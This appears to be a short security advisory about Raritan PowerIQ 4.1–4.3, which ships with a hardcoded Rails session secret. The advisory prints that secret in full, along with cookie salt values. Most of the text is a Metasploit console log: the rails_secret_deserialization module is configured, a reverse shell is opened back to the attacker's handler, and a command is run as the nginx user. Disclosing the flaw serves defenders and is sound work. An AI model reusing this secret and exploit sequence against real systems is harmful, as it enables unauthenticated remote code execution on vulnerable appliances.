Raritan PowerIQ versions 4.1, 4.2, and 4.3 ship with a Rails 2 web
interface with a hardcoded session secret
of 8e238c9702412d475a4c44b7726a0537.
This can be used to achieve unauthenticated remote code execution as the
nginx user on vulnerable systems.
msf exploit(rails_secret_deserialization) > show options
Module options (exploit/multi/http/rails_secret_deserialization):
Name Current Setting
Required Description
---- ---------------
-------- -----------
COOKIE_NAME
no The name of the
session cookie
DIGEST_NAME SHA1
yes The digest type
used to HMAC the session cookie
HTTP_METHOD GET
yes The HTTP request
method (GET, POST, PUT typically work)
Proxies
no A proxy chain of
format type:host:port[,type:host:port][...]
RAILSVERSION 3
yes The target Rails
Version (use 3 for Rails3 and 2, 4 for Rails4)
RHOST 192.168.0.20
yes The target address
RPORT 443
yes The target port
SALTENC
BAh7CUkiCXNrZXkGOgZFRkkiFTgzMzVmNDY2ZDdmOTI2Y2IGOwBUSSINbGljZW5zZWQGOwBGVEkiD3Nlc3Npb25faWQGOwBUSSIlNGJlNzA2Nzk2NWFjYjFmNzU2ZThiY2IyNGVkNWM0MDMGOwBUSSIOcmV0dXJuX3RvBjsARiIGLw==
yes The encrypted cookie salt
SALTSIG 42df31d8a91b45e5ad3e9f3213dc5d6859df1cf8
yes The signed
encrypted cookie salt
SECRET 8e238c9702412d475a4c44b7726a0537
yes The secret_token
(Rails3) or secret_key_base (Rails4) of the application (needed to sign the
cookie)
TARGETURI /login/login
yes The path to a
vulnerable Ruby on Rails application
VALIDATE_COOKIE true
no Only send the
payload if the session cookie is validated
VHOST
no HTTP server
virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(rails_secret_deserialization) > exploit
[*] Started reverse handler on 192.168.0.19:4444
[*] Checking for cookie
[*] Adjusting cookie name to _session_id
[+] SECRET matches! Sending exploit payload
[*] Sending cookie _session_id
[*] Command shell session 1 opened (192.168.0.19:4444 -> 192.168.0.20:43729)
at 2015-03-11 19:45:20 -0500
id
uid=498(nginx) gid=498(nginx) groups=498(nginx),100(users)
--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website